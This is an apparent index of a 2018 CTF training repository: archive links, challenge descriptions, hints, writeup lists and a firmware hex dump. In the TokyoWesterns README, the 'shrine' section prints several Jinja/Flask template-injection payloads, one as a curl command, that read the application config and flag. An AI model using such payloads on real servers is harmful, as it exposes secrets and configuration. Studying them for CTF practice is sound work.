/2018/ISC-2018-蓝鲸魔塔线上赛/Web/蓝鲸日记系统.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Web/蓝鲸日记系统.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Web/蓝鲸笔记管理系统.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/ISC-2018-蓝鲸魔塔线上赛/Web/蓝鲸笔记管理系统.zip


--------------------------------------------------------------------------------
/2018/ISC-2018-蓝鲸魔塔线上赛/Web/题目.md:
--------------------------------------------------------------------------------
 1 | ## 蓝鲸文件管理系统
 2 | 
 3 | ### 260
 4 | 
 5 | 蓝鲸为了整理自己的工具，开发了一个文件管理系统，本来对系统的功能很满意，可是为什么总有人把蓝鲸的文件名修改了？蓝鲸找到了机智的你帮助它审计代码~
 6 | 答案格式whaleCTF{xxx},
 7 | 答题地址：[http://106.39.10.134:10001](http://106.39.10.134:10001/)
 8 | 
 9 | ## 蓝鲸笔记管理系统
10 | 
11 | ### 300
12 | 
13 | 小伙伴们来记笔记咯
14 | 答案格式whaleCTF{xxx}
15 | 答题地址：[http://106.39.10.134:10002](http://106.39.10.134:10002/)
16 | 
17 | ## 蓝鲸相册展览
18 | 
19 | ### 300
20 | 
21 | 塔主总算有时间休息了，于是他去西安，拍了美美的照片后就想给大家展示。可是好景不长，虽然允许大家也上传美丽的图片，可总是有人能够删除他人的成果，快帮助一下蓝鲸吧。
22 | 答案格式whaleCTF{xxxxx}，
23 | 答题地址：[http://106.39.10.134:10003](http://106.39.10.134:10003/)
24 | 
25 | ## 蓝鲸日记系统
26 | 
27 | ### 350
28 | 
29 | 因为太喜欢小美了，我计划创造一个日记系统送给她，然后我留下了一个普通人都不知道的漏洞，我就能悄悄溜进去看看小美的秘密了~
30 | 答题地址：106.39.10.134:10004


--------------------------------------------------------------------------------
/2018/ISG-2018 观安杯安全运维管理赛/README.md:
--------------------------------------------------------------------------------
1 | ### Writeup
2 | 
3 | - [ISG-2018 观安杯安全运维管理赛Writeup](https://mp.weixin.qq.com/s/H3a0w56NR5yq9y_vsIIF2A) 
4 | - [2018中国网络安全技能竞赛“观安杯”管理运维赛 部分Writeup](http://ctfdog.com/ctf/isg2018-writeup/) 


--------------------------------------------------------------------------------
/2018/LCTF2018/LCTF2018.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/LCTF2018/LCTF2018.zip


--------------------------------------------------------------------------------
/2018/LCTF2018/README.md:
--------------------------------------------------------------------------------
1 | ### LCTF2018
2 | 
3 | - [LCTF官方github](https://github.com/LCTF/LCTF2018)
4 | 


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Crypto/mixed-cipher.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Crypto/mixed-cipher.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Crypto/revolutional-secure-angou-de97106aa248a41a40fdd001fc5f7b4b4f28a39eb6bcabf8401b108b7a8961c5.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Crypto/revolutional-secure-angou-de97106aa248a41a40fdd001fc5f7b4b4f28a39eb6bcabf8401b108b7a8961c5.7z


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Crypto/scs7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Crypto/scs7.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Misc/mondai-77791222cdec2fe04bc20eafdb3b330c284d59e35046811c84b47d074e068906.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Misc/mondai-77791222cdec2fe04bc20eafdb3b330c284d59e35046811c84b47d074e068906.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Misc/pysandbox.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Misc/pysandbox.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Misc/vimshell.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Misc/vimshell.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Pwn/BBQ-2c107bf28df3aabb5dbb245fa37ed8887dd6c96b3c42cf1756976ba0b77b9a63.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Pwn/BBQ-2c107bf28df3aabb5dbb245fa37ed8887dd6c96b3c42cf1756976ba0b77b9a63.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Pwn/BBQ-old.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Pwn/BBQ-old.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Pwn/EscapeMe-714f81602f833da6497283263e46ca7918cbc91ba89b0ab4d84460b801a4ed97.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Pwn/EscapeMe-714f81602f833da6497283263e46ca7918cbc91ba89b0ab4d84460b801a4ed97.tar.gz


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Pwn/EscapeMe.txt:
--------------------------------------------------------------------------------
 1 | EscapeMe
 2 | Problem
 3 | host : escapeme.chal.ctf.westerns.tokyo
 4 | port : 16359
 5 | 
 6 | EscapeMe.tar.gz
 7 | 
 8 | Update(2018-09-01 10:22 UTC):
 9 | 
10 | $ uname -a
11 | Linux pwnable-escapeme 4.15.0-1017-gcp #18-Ubuntu SMP Fri Aug 10 10:13:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
12 | $ lsb_release -a
13 | No LSB modules are available.
14 | Distributor ID: Ubuntu
15 | Description:    Ubuntu 18.04.1 LTS
16 | Release:    18.04
17 | Codename:   bionic
18 | Update(2018-09-01 10:30 UTC):
19 | Hint for flag2: check carefully how physical memory of kernel managed.


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Pwn/RKM-f8565f7b4f0e3bf5f2997d65edc5ea76356a2433e74c2251777cda97e692d138.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Pwn/RKM-f8565f7b4f0e3bf5f2997d65edc5ea76356a2433e74c2251777cda97e692d138.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Pwn/load-ef05273401f331748cca5fcb8b14c43f80600adf4266fee4e5f250730b503f0c.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Pwn/load-ef05273401f331748cca5fcb8b14c43f80600adf4266fee4e5f250730b503f0c.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Pwn/neighbor_c-310f2ca86ab0025591c201502ccb4bc3a13b30350b106e693cf483fbdb2b76b1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Pwn/neighbor_c-310f2ca86ab0025591c201502ccb4bc3a13b30350b106e693cf483fbdb2b76b1.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Pwn/swap_returns-b53223ca8f38cb4615ba13aa2671431bdd8fbb84b033b8c87327e5bd17aaeab6.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Pwn/swap_returns-b53223ca8f38cb4615ba13aa2671431bdd8fbb84b033b8c87327e5bd17aaeab6.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Pwn/twgc-18e0a86aae9b32113cd3089cc1574a897bc258553a9959dc734783228e4ce5a0.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Pwn/twgc-18e0a86aae9b32113cd3089cc1574a897bc258553a9959dc734783228e4ce5a0.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/README.md:
--------------------------------------------------------------------------------
  1 | 比赛时间：2018/09/01 01:00:00 UTC — 2018/09/03 01:00:00 UTC
  2 | 
  3 | 比赛地址：https://score.ctf.westerns.tokyo/
  4 | 
  5 | ### Writeup
  6 | 
  7 | - **scs7** 
  8 | 
  9 |   https://ctftime.org/writeup/10861 by hackstreetboys
 10 | 
 11 |   https://github.com/OAlienO/CTF/tree/master/2018/TokyoWesterns-CTF-4th/scs7
 12 | 
 13 | - **pysandbox** 
 14 | 
 15 |   https://ctftime.org/writeup/10857 by hackstreetboys
 16 | 
 17 |   https://ctftime.org/writeup/10852 by DoubleSigma
 18 | 
 19 |   https://github.com/pberba/ctf-solutions/tree/master/20180901_tokyo_western/pysandbox 
 20 | 
 21 |   https://github.com/OAlienO/CTF/tree/master/2018/TokyoWesterns-CTF-4th/pysandbox
 22 | 
 23 | - **vimshell** 
 24 | 
 25 |   https://ctftime.org/writeup/10860 by Lorem Checksum
 26 | 
 27 |   https://ctftime.org/writeup/10859 by Lattice
 28 | 
 29 |   https://ctftime.org/writeup/10854 by DoubleSigma
 30 | 
 31 | - **shrine** 
 32 | 
 33 |   几种payload：
 34 | 
 35 |   ```bash
 36 |   curl -g "http://shrine.chal.ctf.westerns.tokyo/shrine/{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}"
 37 |   ```
 38 | 
 39 |   ```http
 40 |   http://shrine.chal.ctf.westerns.tokyo/shrine/{{session.__class__.__base__.get.__globals__['warnings']['sys']['modules']['app'].__dict__['app'].__dict__}}
 41 |   ```
 42 | 
 43 |   ```http
 44 |   http://shrine.chal.ctf.westerns.tokyo/shrine/{{request.__class__.__dict__['_load_form_data'].__globals__['current_app'].config}}
 45 |   ```
 46 |   ```http
 47 |   http://shrine.chal.ctf.westerns.tokyo/shrine/{{url_for.__globals__['current_app'].config['FLAG']}}
 48 |   ```
 49 | 
 50 |   ```http
 51 |   http://shrine.chal.ctf.westerns.tokyo/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
 52 |   ```
 53 | 
 54 |   https://ctftime.org/writeup/10851 by DoubleSigma
 55 | 
 56 |   https://ctftime.org/writeup/10895 by PwnaSonic
 57 | 
 58 | - **SimpleAuth** 
 59 | 
 60 |   https://fireshellsecurity.team/simpleauth/ 
 61 | 
 62 |   https://ctftime.org/writeup/10876 by E-Toolz
 63 | 
 64 |   https://ctftime.org/writeup/10891 by PwnaSonic
 65 | 
 66 | - **Slack emoji converter**
 67 | 
 68 |   https://ctftime.org/writeup/10912 by BambooFox
 69 | 
 70 | - **load** 
 71 | 
 72 |   https://lordidiot.github.io/2018-09-03/tokyowesterns-ctf-2018-load-pwn/
 73 | 
 74 |   https://github.com/OAlienO/CTF/tree/master/2018/TokyoWesterns-CTF-4th/scs7 
 75 | 
 76 |   https://gitlab.com/telnet/CTF-2018/blob/master/twctf/load/README.md
 77 | 
 78 |   https://ctftime.org/writeup/10863 
 79 | 
 80 | - **Swap Returns** 
 81 | 
 82 |   https://ctftime.org/writeup/10864 by 10sec
 83 | 
 84 |   https://lordidiot.github.io/2018-09-03/tokyowesterns-ctf-2018-swap-returns-pwn/
 85 | 
 86 |   https://gitlab.com/snippets/1750518
 87 | 
 88 | - **BBQ** 
 89 | 
 90 |   https://changochen.github.io/2018/09/01/Tokyo-Western_CTF-2018/
 91 | 
 92 | - **Revolutional Secure Angou** 
 93 | 
 94 |   https://4rch4ngel6320.wordpress.com/2018/09/03/revolutional-secure-angou-writeup/
 95 | 
 96 |   https://ctftime.org/writeup/10867
 97 | 
 98 |   https://ctftime.org/writeup/10865
 99 | 
100 |   https://ctftime.org/writeup/10862
101 | 
102 |   https://ctftime.org/writeup/10850
103 | 
104 | - **mixed cipher** 
105 | 
106 |   https://github.com/GabiTulba/Tokyo-Westerns-2018-Mixed-Cipher-Crypto-Write-up/blob/master/README.md
107 | 
108 |   https://github.com/OAlienO/CTF/tree/master/2018/TokyoWesterns-CTF-4th/mixed-cipher
109 | 
110 | - **Neighbor C** 
111 | 
112 |   https://ctftime.org/writeup/10873 by OpenToAll
113 | 
114 | - **EscapeMe** 
115 | 
116 |   [TokyoWesterns CTF 2018 - pwn240+300+300 EscapeMe](https://david942j.blogspot.com/2018/09/write-up-tokyowesterns-ctf-2018.html) 
117 | 
118 | - **dec dec dec**
119 | 
120 |   https://github.com/ccowmu/ctf_2018/tree/master/writeups/TokyoCTF2018/dec-dec-dec 
121 | 
122 | - **Matrix LED**
123 | 
124 |   https://github.com/p4-team/ctf/tree/master/2018-09-01-tokyowesterns/matrix_led 
125 | 
126 | - **tw playing card**
127 | 
128 |   https://github.com/zounathtan/ctf/blob/master/writeups/2018/TokyoWesterns_CTF/tw_playing_card/Readme.md 
129 | 
130 | - **REVersiNG**
131 | 
132 |   https://github.com/sea0breeze/ctf/tree/master/twctf-2018/REVersiNG
133 | 
134 | - **其他**：
135 | 
136 |   [TokyoWestern CTF WriteUp by r3kapig](https://www.anquanke.com/post/id/158894) 
137 | 
138 |   [Revolutional Secure Angou](https://ctftime.org/writeup/10862) by SealTeam1
139 | 
140 |   [Tokyo Western CTF 2018 (Qualification Round) Hints for some Crypto challenges](https://github.com/nguyenduyhieukma/CTF-Writeups/tree/master/Tokyo%20Western%20CTF/2018) 
141 | 
142 |   [TokyoWesterns CTF 4th 2018 - Write-ups](https://rawsec.ml/en/Tokyo-Westerns-2018-write-ups/) 
143 | 
144 | 


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Reverse/DartS-97a8961947219a9880a86c19d83afc4e2212532f1a6822fd63320887e2485b38.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Reverse/DartS-97a8961947219a9880a86c19d83afc4e2212532f1a6822fd63320887e2485b38.7z


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Reverse/MatrixLED-7e8889a79686d431e9a7f0210938bfc342399970bc045ecd19a988bffc5477a7.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Reverse/MatrixLED-7e8889a79686d431e9a7f0210938bfc342399970bc045ecd19a988bffc5477a7.7z


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Reverse/MatrixLED.txt:
--------------------------------------------------------------------------------
 1 | Matrix LED
 2 | Problem
 3 | MatrixLED.7z
 4 | 
 5 | https://youtu.be/C6cux2fM7fg
 6 | 
 7 | Update(2018-09-01 20:05 UTC):
 8 | 
 9 | The contents of flag.jpg was incorrect, therefore we show below a part of flag.jpg.
10 | 
11 | 00000000: d091 577d 5889 e647 24e3 a93b c1f8 112f  ..W}X..G$..;.../
12 | 00000010: 86d0 f06b e859 0728 2962 9b1d a7bf 74b8  ...k.Y.()b....t.
13 | =============================== snip ==============================
14 | 0000d100: 761c 538c c367 0f9b 945c 3a3f ca6f 40db  v.S..g...\:?.o@.
15 | 0000d110: 3de9 1a4c beab                           =..L..
16 | And the flag is updated.
17 | 
18 | The new flag is
19 | 
20 | from hashlib import md5
21 | print 'TWCTF{{{}}}'.format(md5(open('flag.jpg', 'rb').read()).hexdigest())


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Reverse/REVersiNG-506b37abc07f52d16ac8342b57b36932b8bf1be42b5b5cdb12ec656448ac668f.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Reverse/REVersiNG-506b37abc07f52d16ac8342b57b36932b8bf1be42b5b5cdb12ec656448ac668f.7z


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Reverse/REVersiNG.txt:
--------------------------------------------------------------------------------
 1 | REVersiNG
 2 | Problem
 3 | REVersiNG.7z
 4 | 
 5 | host : pwn1.chal.ctf.westerns.tokyo
 6 | port : 16625
 7 | 
 8 | The flag is
 9 | 
10 | print 'TWCTF{{{}}}'.format(open('key', 'rb').read().encode('hex'))


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Reverse/dec_dec_dec-c55c231bfbf686ab058bac2a56ce6cc49ae32fe086af499571e335c9f7417e5b.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Reverse/dec_dec_dec-c55c231bfbf686ab058bac2a56ce6cc49ae32fe086af499571e335c9f7417e5b.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Reverse/tw_playing_card-cf4512000e5797d94e1d98c3af040bd87523081c1ab3f58dea3b70047b634c9f.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Reverse/tw_playing_card-cf4512000e5797d94e1d98c3af040bd87523081c1ab3f58dea3b70047b634c9f.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Web/Shrine.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Web/Shrine.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Web/SimpleAuth.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Web/SimpleAuth.zip


--------------------------------------------------------------------------------
/2018/TokyoWesterns-CTF-4th-2018/Web/Slack emoji converter.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/TokyoWesterns-CTF-4th-2018/Web/Slack emoji converter.zip


--------------------------------------------------------------------------------
/2018/XJNUCTF/README.md:
--------------------------------------------------------------------------------
1 | ## writeup
2 | 
3 | 详见**XJNUwp.pdf**
4 | 


--------------------------------------------------------------------------------
/2018/XJNUCTF/XJNUwp.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/XJNUCTF/XJNUwp.pdf


--------------------------------------------------------------------------------
/2018/XJNUCTF/baby.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/XJNUCTF/baby.zip


--------------------------------------------------------------------------------
/2018/XJNUCTF/misc15.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/XJNUCTF/misc15.zip


--------------------------------------------------------------------------------
/2018/XJNUCTF/misc20.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/XJNUCTF/misc20.zip


--------------------------------------------------------------------------------
/2018/XJNUCTF/misc30.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/XJNUCTF/misc30.zip


--------------------------------------------------------------------------------
/2018/XJNUCTF/misc40.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/XJNUCTF/misc40.zip


--------------------------------------------------------------------------------
/2018/XJNUCTF/misc50.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/XJNUCTF/misc50.zip


--------------------------------------------------------------------------------
/2018/XJNUCTF/misc80.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/XJNUCTF/misc80.zip


--------------------------------------------------------------------------------
/2018/XJNUCTF/题目.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/XJNUCTF/题目.docx


--------------------------------------------------------------------------------
/2018/hctf/Blockchain/ReEthereum from zero/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | nc ethre.2018.hctf.io 2018
3 | Ethereum smart contract reverse series – 2 day from entry to give up. 
4 | hint1: debug admin transaction can help you reverse opcode. admin deploy four constract, but one is error constract, only three constract is useful
5 | hint2:ethre update a hint. Please use nc to check.
6 | URL http://example.com


--------------------------------------------------------------------------------
/2018/hctf/Blockchain/bet2loss/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | 0x006b9bc418e43e92cf8d380c56b8d4be41fda319 for ropsten and open source 
3 | D2GBToken is onsale. Now New game is coming.
4 | We’ll give everyone 1000 D2GBTOKEN for playing. only God of Gamblers can get flag.
5 | URL http://bet2loss.2018.hctf.io


--------------------------------------------------------------------------------
/2018/hctf/Blockchain/ez2win/desc.txt:
--------------------------------------------------------------------------------
 1 | Description 
 2 | 0x71feca5f0ff0123a60ef2871ba6a6e5d289942ef for ropsten
 3 | D2GBToken is onsale. we will airdrop each person 10 D2GBTOKEN. You can transcat with others as you like.
 4 | only winner can get more than 10000000, but no one can do it.
 5 | function PayForFlag(string b64email) public payable returns (bool success){
 6 | 
 7 |     
 8 |     require (_balances[msg.sender] > 10000000);
 9 | 
10 |       emit GetFlag(b64email, "Get flag!");
11 | 
12 |   }
13 | 
14 | hint:you should recover eht source code first. and break all eht concepts you've already hold
15 | URL http://example.com


--------------------------------------------------------------------------------
/2018/hctf/README.md:
--------------------------------------------------------------------------------
1 | ## Wirteup
2 | 
3 | - [HCTF2018 Writeup -- 天枢](https://xz.aliyun.com/t/3256) 
4 | - [2018 HCTF Web Writeup](http://skysec.top/2018/11/12/2018-HCTF-Web-Writeup/)
5 | - [HCTF 2018 Web Write-up](http://momomoxiaoxi.com/ctf/2018/11/12/HCTF2018/)
6 | 
7 | 


--------------------------------------------------------------------------------
/2018/hctf/Rev/LuckyStar☆/LuckyStar.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/hctf/Rev/LuckyStar☆/LuckyStar.exe


--------------------------------------------------------------------------------
/2018/hctf/Rev/LuckyStar☆/desc.txt:
--------------------------------------------------------------------------------
1 | Description 
2 | Lucky channel!
3 | backup: https://hctf-1253126740.cos.ap-hongkong.myqcloud.com/LuckyStar.exe


--------------------------------------------------------------------------------
/2018/hctf/Rev/PolishDuck/PolishDuck.hex:
--------------------------------------------------------------------------------
  1 | :100000000C94E9000C9411010C9411010C94110151
  2 | :100010000C9411010C9411010C9411010C94110118
  3 | :100020000C9411010C9411010C9427030C94990366
  4 | :100030000C9411010C9411010C9411010C941101F8
  5 | :100040000C9411010C9411010C9411010C941101E8
  6 | :100050000C9411010C9411010C9411010C94F008F2
  7 | :100060000C9411010C9411010C9411010C941101C8
  8 | :100070000C9411010C9411010C9411010C941101B8
  9 | :100080000C9411010C9411010C9411010C941101A8
 10 | :100090000C9411010C9411010C9411010C94110198
 11 | :1000A0000C9411010C9411010C941101000000003A
 12 | :1000B000000000002A2B28000000000000000000C3
 13 | :1000C0000000000000000000000000002C9EB4A012
 14 | :1000D000A1A2A434A6A7A5AE362D3738271E1F200F
 15 | :1000E000212223242526B333B62EB7B89F848586D4
 16 | :1000F0008788898A8B8C8D8E8F9091929394959618
 17 | :100100009798999A9B9C9D2F3130A3AD3504050695
 18 | :100110000708090A0B0C0D0E0F10111213141516F7
 19 | :100120001718191A1B1C1DAFB1B0B500080B00023F
 20 | :10013000020201000904000001020200000524007F
 21 | :100140001001052401010104240206052406000112
 22 | :100150000705810310004009040100020A000000A5
 23 | :100160000705020240000007058302400000040367
 24 | :10017000090412010002EF02014041233680000110
 25 | :100180000102030141726475696E6F204C4C43009B
 26 | :1001900041726475696E6F204C656F6E6172646F39
 27 | :1001A0000005010906A1018502050719E029E715E7
 28 | :1001B0000025017501950881029501750881039557
 29 | :1001C000067508150025730507190029738100C0FD
 30 | :1001D0003A0911241FBECFEFDAE0DEBFCDBF14E035
 31 | :1001E000A0E0B1E0E0E5FAE102C005900D92A03F89
 32 | :1001F000B107D9F725E0A0EFB4E001C01D92A23904
 33 | :10020000B207E1F710E0C9EED0E004C02197FE018B
 34 | :100210000E941B0DC83ED107C9F70E94A8090C9483
 35 | :10022000260D0C9400004091FE045091FF04209193
 36 | :10023000FC043091FD0442175307B4F49091E80098
 37 | :100240009570E1F39091E80092FD19C08093F10060
 38 | :100250008091FE049091FF0401968F739927892B5A
 39 | :1002600019F48EEF8093E8008091FE049091FF04D2
 40 | :1002700001969093FF048093FE0481E0089580E04E
 41 | :100280000895CF92DF92EF92FF920F931F93CF9337
 42 | :10029000DF931F92CDB7DEB7182F062FE42E862FDF
 43 | :1002A000880F8E5F99830E94130183E00E941301DF
 44 | :1002B000F12EC12E9981D92E8C2D8F19801798F48B
 45 | :1002C000F601E7FE02C0849101C080810E94130103
 46 | :1002D000182F80E00E9413018123FFEFCF1ADF0A5D
 47 | :1002E0008111EACF01C081E00F90DF91CF911F9182
 48 | :1002F0000F91FF90EF90DF90CF900895DF92EF92F3
 49 | :10030000FF920F931F93CF93DF93D82E8A017B0127
 50 | :10031000E40EF51EEB01CE15DF0571F0D7FE03C02C
 51 | :10032000FE01849101C088810E94130121968111F0
 52 | :10033000F2CF8FEF9FEF01C0C801DF91CF911F91E6
 53 | :100340000F91FF90EF90DF900895615030F0209171
 54 | :10035000F100FC0120830196F8CF289884E6809371
 55 | :1003600004050895CF92DF92EF92FF920F931F93AF
 56 | :10037000CF93DF936C017A018B01C0E0D0E0CE1502
 57 | :10038000DF0589F0D8016D918D01D601ED91FC91C9
 58 | :100390000190F081E02DC6010995892B11F47E01B1
 59 | :1003A00002C02196ECCFC701DF91CF911F910F9131
 60 | :1003B000FF90EF90DF90CF9008958091F404811129
 61 | :1003C0000DC082E08093F00484E08093F1041092E9
 62 | :1003D000F3041092F20481E08093F40480EF94E03F
 63 | :1003E00008950F931F93CF93DF931F92CDB7DEB77E
 64 | :1003F00082E0898342E450E06CE271E080E80E9490
 65 | :100400007E010E94DD01DC0112960D911C91139773
 66 | :100410000115110569F0D801ED91FC910280F3817D
 67 | :10042000E02DBE016F5F7F4FC801099597FF07C0A0
 68 | :1004300089810F90DF91CF911F910F910895F8015D
 69 | :1004400000851185E5CFDC01FB0112968C91129796
 70 | :1004500090E02481358182179307D1F491818081C6
 71 | :10046000813A31F481E0913091F0933089F411C0F8
 72 | :10047000813271F49B3021F482811F968C9305C0E8
 73 | :100480009A3031F4828150968C9381E008950895DA
 74 | :1004900080E00895DC01FB0188E4808389E48183A6
 75 | :1004A00084E482831D969C911D979F709F5B93832C
 76 | :1004B0001D968D919C911E9724E0969587952A957F
 77 | :1004C000E1F78F708F5B848385E00895EF92FF9250
 78 | :1004D0000F931F93CF93DF93FB012081213851F5B8
 79 | :1004E0002381223239F5DC0112962C9130E04481CF
 80 | :1004F000558142175307F1F4EC010B851C85E12C63
 81 | :10050000F12C0115110591F0F801448155816281AA
 82 | :10051000738180E80E947E018F3FFFEF9F0769F0A3
 83 | :10052000E80EF91ED8010D911C91EBCF81E08F8769
 84 | :10053000C70105C080E090E002C08FEF9FEFDF9120
